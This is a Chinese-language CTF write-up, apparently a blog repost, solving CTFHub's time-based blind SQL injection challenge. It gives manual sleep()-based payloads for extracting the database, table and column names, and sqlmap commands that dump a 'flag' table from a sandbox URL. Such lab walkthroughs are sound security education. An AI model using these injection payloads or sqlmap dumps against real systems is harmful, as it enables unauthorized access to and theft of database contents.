当前位置: 首页 > article >正文

2025.1.15——五、时间盲注

article 2025/1/20 2:34:18

题目来源:ctfhub技能树

目录

一、基本操作:整理已知信息,得本题为时间盲注

二、手工注入解题

step 1:手工注入确认为时间盲注

step 2:爆数据库长度、名称

1.数据库长度

2.数据库名

step 3:爆表数、长度、名称

1.爆表数

2.爆表名长度

3.爆具体名称

三、sqlmap解题

step1:爆数据库名

step 2:爆表名

step 3:爆列名

step 4:爆具体数据

四、小结

一、基本操作:整理已知信息,得本题为时间盲注

二、手工注入解题

step 1:手工注入确认为时间盲注

键入:1

键入:1'

以上均无反应

但一下payload

 1 and sleep(10)

明显感觉到延迟

step 2:爆数据库长度、名称

1.数据库长度

1 and if(length(database())=4,sleep(10),1)

2.数据库名

1 and if(ascii(substr(database(),1,1))>110,sleep(5),1)

先判断字符范围

逐步确认信息

1 and if(ascii(substr(database(),1,1))=115,sleep(15),1)

逐步得到信息115 113 108 105,得数据库名是sqli

step 3:爆表数、长度、名称

1.爆表数

1 and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1)

2.爆表名长度

正确payload如下

1 and if(length((select table_name from information_schema.tables where table_schema='sqli' limit 0,1))=4,sleep(10),1)

注:这里length()函数中需要一个括号将select语句括起来,才算完整,否则运行不下去

3.爆具体名称

以下payload无语法错误,但是运行不出来是因为表排列顺序不同

1 and if(ascii((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),1,1)=110,sleep(15),1)

1 and if(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),1,1)='n',sleep(15),1)

1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),1,1))=110,sleep(15),1)

正确payload如下

1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),1,1))=102,sleep(5),1)

这里的问题是表的顺序,第一个表是news,第二个表是flag    

三、sqlmap解题

sqlmap爆数据库名、表名、列名、具体数据形式

sqlmap -u url --current-db

sqlmap -u url -D sqli --tables

sqlmap -u url -D sqli -T flag --columns

sqlmap -u url -D sqli -T flag -C flag --dump

step1:爆数据库名

python sqlmap.py -u http://challenge-230a0a451072c076.sandbox.ctfhub.com:10800/?id=1 --current-db

step 2:爆表名

python sqlmap.py -u http://challenge-230a0a451072c076.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

step 3:爆列名

python sqlmap.py -u http://challenge-230a0a451072c076.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

step 4:爆具体数据

python sqlmap.py -u http://challenge-230a0a451072c076.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

四、小结

        sqlmap中有value字样,是说有几个值,比如爆具体数据时显示1,说明有一个值在其中


http://www.kler.cn/a/510087.html

相关文章:

  • 高性能、并发安全的 Go 嵌入式缓存库 如何使用?
  • 前端基础笔记
  • 26个开源Agent开发框架调研总结(一)
  • 深入了解卷积神经网络(CNN):图像处理与深度学习的革命性技术
  • minio https配置
  • 网络设备安全保证计划 (NESAS) - 供应商视角 笔记
  • 音乐播放器实现:前端HTML,CSS,JavaScript综合大项目
  • Python----Python高级(模块与包,Python基本库)
  • java权限修饰符
  • 线上工单引发的思考:Spring Boot 中 @Autowired 与 @Resource 的区别
  • YOLOv10-1.1部分代码阅读笔记-ops.py
  • 【HarmonyOS NAPI 深度探索9】发布到 npm 并管理版本
  • kubuntu24.04配置vmware17.5.1
  • 【Office学习】PPT中的图片如何放清晰地放到论文中
  • 深度学习J9周:Inception v3算法实战与解析
  • git创建分支,推送分支,合并分支,回退
  • 使用 Python 开发一个 AI Agent 自媒体助手示例
  • dbt Semantic Layer 详细教程-6 :指标(metrics)配置规范及示例
  • 认识 MySQL 和 Redis 的数据一致性问题
  • 动态主机配置协议 (DHCPv4)介绍,详细DHCP协议学习笔记
  • LeetCode:47.全排列 II
  • WPS计算机二级•高效操作技巧
  • TCP TIME-WAIT 状态为什么要坚持 2MSL
  • 【MySQL中InnoDB引擎的行锁是怎么实现的?】
  • 业务幂等性技术架构体系之服务幂等深入剖析
  • Java并发编程:线程安全的策略与实践